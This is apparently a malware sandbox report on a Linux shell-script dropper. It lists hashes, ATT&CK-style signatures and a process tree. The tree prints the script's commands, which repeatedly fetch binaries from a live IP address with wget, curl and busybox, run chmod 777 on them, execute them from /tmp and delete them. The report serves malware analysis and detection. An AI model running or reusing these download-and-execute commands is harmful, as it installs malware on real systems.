Analysis
-
max time kernel
35s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 02:43
Static task
static1
Behavioral task
behavioral1
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh
-
Size
10KB
-
MD5
eeab4766daa60dbedfe5ac8ed6379d9b
-
SHA1
9bc333ca6165533554a6ae360550dd5b28050e51
-
SHA256
c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad
-
SHA512
9e67b335a4b29e5381bbba0e4b024f17164814614713df6763b598063707277000f155eb47bcdd5ce7c785eaf790fffe084134540be358aa1bea4ce7fadc518c
-
SSDEEP
192:N5pZuLnRjPMfpMnOWrt609vuOZKu6j6MOWrt609uOZKuiJpZuLnIbjPMF:NkjPMfpMnOWrw09vuOZKu6j6MOWrw09z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh/tmp/c8197f4b09c6dbb4b5f68262c2bcbeb244d16800ca8c7201c7010473abf97cad.sh1⤵PID:1498
-
/bin/rm/bin/rm bins.sh2⤵PID:1499
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1500
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1506
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1512
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1518
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1524
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1530
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1536
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1542
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1548
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1554
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1560
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1566
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1572
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1578
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1584
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1590
-
-
/bin/chmodchmod 777 C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP./C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm C2RlkwrYZJQhou0flB54ZavxeMOjgcJsyP2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1596
-
-
/bin/chmodchmod 777 Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr./Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm Y1qIFXe00q9E7lYs7IkXRXhRmg3mwoQZTr2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1602
-
-
/bin/chmodchmod 777 FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD./FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm FM9mzo2wFMOY7FFNUexJrH1qno42DoIOZD2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1608
-
-
/bin/chmodchmod 777 lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a./lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm lrKnr3034wAUb5b0tP4IwCRQ5ayk865E6a2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1614
-
-
/bin/chmodchmod 777 opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu./opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm opqv7SDxvt4jAkiON4xTKQYP4ZsrTmUDCu2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1620
-
-
/bin/chmodchmod 777 HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY./HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm HSpQmc5Ew2KXGNM44Q3tgujbE9exmiEwbY2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Writes file to tmp directory
PID:1627
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1628
-
-
/bin/chmodchmod 777 Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- File and Directory Permissions Modification
PID:1629
-
-
/tmp/Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT./Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵
- Executes dropped EXE
PID:1630
-
-
/bin/rmrm Ty4mb8KH1CjAEfmy9ahIiEWvVectjro4mT2⤵PID:1631
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1632
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1634
-
-
/bin/chmodchmod 777 MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/MVUvjhjXabjTaojsETsh4UPCh61BO1XLel./MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵
- Executes dropped EXE
PID:1636
-
-
/bin/rmrm MVUvjhjXabjTaojsETsh4UPCh61BO1XLel2⤵PID:1637
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1638
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Writes file to tmp directory
PID:1639
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1640
-
-
/bin/chmodchmod 777 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- File and Directory Permissions Modification
PID:1641
-
-
/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1646
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1652
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1658
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1664
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1670
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97